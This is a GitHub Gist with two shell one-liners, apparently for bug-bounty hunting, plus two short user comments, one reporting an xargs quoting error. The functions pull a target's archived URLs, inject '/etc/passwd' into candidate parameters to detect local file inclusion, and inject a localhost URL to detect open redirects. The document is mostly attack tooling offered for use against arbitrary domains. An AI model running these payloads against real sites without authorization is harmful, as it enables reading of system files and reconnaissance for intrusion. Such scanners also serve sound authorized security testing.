Last active
November 24, 2024 19:04
-
-
Save dwisiswant0/82e5320152fbc35f95aefa23d6d9331b to your computer and use it in GitHub Desktop.
One-liner to get Open-redirect & LFI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| lfi() { | |
| gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' | |
| } | |
| open-redirect() { | |
| local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thank's for oneliner
I get this error when running any of them
xargs: unmatched single quote; by default quotes are special to xargs unless you use the -0 option